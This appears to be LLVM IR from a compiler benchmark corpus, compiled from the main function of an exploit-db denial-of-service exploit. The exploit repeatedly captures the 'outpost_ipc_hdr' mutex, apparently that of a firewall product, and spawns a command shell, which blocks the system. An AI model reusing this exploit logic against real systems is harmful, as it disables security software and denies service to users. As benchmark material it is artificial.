; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/multiple/dos/extr_30139.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/multiple/dos/extr_30139.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [34 x i8] c"\\BaseNamedObjects\\outpost_ipc_hdr\00", align 1
@.str.1 = private unnamed_addr constant [74 x i8] c"Mutex captured.\0ARunning system shell. This action will block the system.\0A\00", align 1
@.str.2 = private unnamed_addr constant [4 x i8] c"cmd\00", align 1
@SW_NORMAL = common dso_local global i32 0, align 4
@stderr = common dso_local global i32 0, align 4
@.str.3 = private unnamed_addr constant [44 x i8] c"Unable to capture \22outpost_ipc_hdr\22 mutex.\0A\00", align 1
@.str.4 = private unnamed_addr constant [15 x i8] c"\0ATEST FAILED!\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i64, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %7 = call i32 (...) @about()
  %8 = load i32, i32* %4, align 4
  %9 = icmp ne i32 %8, 1
  br i1 %9, label %10, label %12

10:                                               ; preds = %2
  %11 = call i32 (...) @usage()
  store i32 1, i32* %3, align 4
  br label %27

12:                                               ; preds = %2
  br label %13

13:                                               ; preds = %12, %24
  %14 = call i64 @capture_mutex(i8* getelementptr inbounds ([34 x i8], [34 x i8]* @.str, i64 0, i64 0))
  store i64 %14, i64* %6, align 8
  %15 = load i64, i64* %6, align 8
  %16 = icmp ne i64 %15, 0
  br i1 %16, label %17, label %21

17:                                               ; preds = %13
  %18 = call i32 @printf(i8* getelementptr inbounds ([74 x i8], [74 x i8]* @.str.1, i64 0, i64 0))
  %19 = load i32, i32* @SW_NORMAL, align 4
  %20 = call i32 @WinExec(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.2, i64 0, i64 0), i32 %19)
  br label %24

21:                                               ; preds = %13
  %22 = load i32, i32* @stderr, align 4
  %23 = call i32 @fprintf(i32 %22, i8* getelementptr inbounds ([44 x i8], [44 x i8]* @.str.3, i64 0, i64 0))
  br label %25

24:                                               ; preds = %17
  br label %13

25:                                               ; preds = %21
  %26 = call i32 @printf(i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str.4, i64 0, i64 0))
  store i32 1, i32* %3, align 4
  br label %27

27:                                               ; preds = %25, %10
  %28 = load i32, i32* %3, align 4
  ret i32 %28
}

declare dso_local i32 @about(...) #1

declare dso_local i32 @usage(...) #1

declare dso_local i64 @capture_mutex(i8*) #1

declare dso_local i32 @printf(i8*) #1

declare dso_local i32 @WinExec(i8*, i32) #1

declare dso_local i32 @fprintf(i32, i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
